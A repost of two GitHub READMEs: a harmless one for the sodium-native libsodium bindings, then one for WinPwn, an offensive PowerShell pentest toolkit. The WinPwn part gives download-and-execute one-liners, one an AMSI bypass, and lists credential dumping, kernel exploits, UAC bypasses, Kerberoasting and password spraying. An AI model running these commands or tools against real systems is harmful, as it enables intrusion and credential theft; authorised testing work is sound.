sodium-native Low level bindings for libsodium. npm install sodium-native The goal of this project is to be thin, stable, unopionated wrapper around libsodium. All methods exposed are more or less a direct translation of the libsodium c-api. This means that most data types are buffers and you have to manage allocating return values and passing them in as arguments intead of receiving them as return values. This makes this API harder to use than other libsodium wrappers out there, but also means that you'll be able to get a lot of perf / memory improvements as you can do stuff like inline encryption / decryption, re-use buffers etc. This also makes this library useful as a foundation for more high level crypto abstractions that you want to make. Usage var sodium = require('sodium-native') var nonce = Buffer.alloc(sodium.crypto_secretbox_NONCEBYTES) var key = sodium.sodium_malloc(sodium.crypto_secretbox_KEYBYTES) // secure buffer var message = Buffer.from('Hello, World!') var ciphertext = Buffer.alloc(message.length + sodium.crypto_secretbox_MACBYTES) sodium.randombytes_buf(nonce) // insert random data into nonce sodium.randombytes_buf(key) // insert random data into key // encrypted message is stored in ciphertext. sodium.crypto_secretbox_easy(ciphertext, message, nonce, key) console.log('Encrypted message:', ciphertext) var plainText = Buffer.alloc(ciphertext.length - sodium.crypto_secretbox_MACBYTES) if (!sodium.crypto_secretbox_open_easy(plainText, ciphertext, nonce, key)) { console.log('Decryption failed!') } else { console.log('Decrypted message:', plainText, '(' + plainText.toString() + ')') } Documentation Complete documentation may be found on the sodium-friends website License MIT Sursa: https://github.com/sodium-friends/sodium-native

WinPwn In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. I often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. They are loaded into RAM via IEX Downloadstring. Any suggestions, feedback, Pull requests and comments are welcome! Just Import the Modules with: Import-Module .\WinPwn.ps1 or iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') For AMSI Bypass use the following oneliner: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1') If you find yourself stuck on a windows system with no internet access - no problem at all, just use Offline_Winpwn.ps1, all scripts and executables are included. Functions available after Import: WinPwn -> Menu to choose attacks: Inveigh -> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integrated sessionGopher -> Executes Sessiongopher Asking you for parameters kittielocal -> Obfuscated Invoke-Mimikatz version Safetykatz in memory Dump lsass using rundll32 technique Download and run obfuscated Lazagne Dump Browser credentials Customized Mimikittenz Version Exfiltrate Wifi-Credentials Dump SAM-File NTLM Hashes localreconmodules -> Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP Checks the Powershell event logs for credentials or other sensitive informations Collect Browser Credentials and history Search for passwords in the registry and on the file system Find sensitive files (config files, RDP files, keepass Databases) Search for .NET Binaries on the local system Optional: Get-Computerdetails (Powersploit) and PSRecon domainreconmodules -> Collect various domain informations for manual review Find AD-Passwords in description fields Search for potential sensitive domain share files ACLAnalysis Unconstrained delegation systems/users are enumerated MS17-10 Scanner for domain systems Bluekeep Scanner for domain systems SQL Server discovery and Auditing functions (default credentials, passwords in the database and more) MS-RPRN Check for Domaincontrollers or all systems Group Policy Audit with Grouper2 An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. Privescmodules -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords, dll Hijacking, File Permissions, IKEExt Check, Rotten/Juicy Potato Check) kernelexploits -> MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only! MS16-032 - (2008/7/8/10/2012)! MS16-135 - (WS2k16 only)! CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1! CVE-2019-0841 - April 2019! CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019! CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019! CVE-2019-1215 - September 2019 - x64 only! CVE-2020-0638 - February 2020 - x64 only! Juicy-Potato Exploit UACBypass -> UAC Magic, Based on James Forshaw's three part post on UAC UAC Bypass cmstp technique, by Oddvar Moe DiskCleanup UAC Bypass, by James Forshaw DccwBypassUAC technique, by Ernesto Fernandez and Thomas Vanhoutte shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit) groupsearch -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit) Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking powerSQL -> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection Attacks Sharphound -> Bloodhound 3.0 Report adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record MS17-10 -> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerability Sharpcradle -> Load C# Files from a remote Webserver to RAM DomainPassSpray -> DomainPasswordSpray Attacks, one password for all domain users bluekeep -> Bluekeep Scanner for domain systems TO-DO Some obfuskation More obfuscation Proxy via PAC-File support Get the scripts from my own creds repository (https://github.com/S3cur3Th1sSh1t/Creds) to be independent from changes in the original repositories More Recon/Exploitation functions Add MS17-10 Scanner Add menu for better handling of functions Amsi Bypass Mailsniper integration CREDITS Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash Arvanaghi - SessionGopher PowerShellMafia - Powersploit Dionach - PassHunt A-mIn3 - WINSpect 411Hall - JAWS sense-of-security - ADrecon dafthack - DomainPasswordSpray rasta-mouse - Sherlock, AMsi Bypass AlessandroZ - LaZagne samratashok - nishang leechristensen - Random Repo HarmJ0y - Many good Blogposts, Gists and Scripts NETSPI - PowerUpSQL Cn33liz - p0wnedShell rasta-mouse - AmsiScanBufferBypass l0ss - Grouper2 dafthack - DomainPasswordSpray enjoiz - PrivEsc James Forshaw - UACBypasses Oddvar Moe - UACBypass Legal disclaimer: Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes. Sursa: https://github.com/S3cur3Th1sSh1t/WinPwn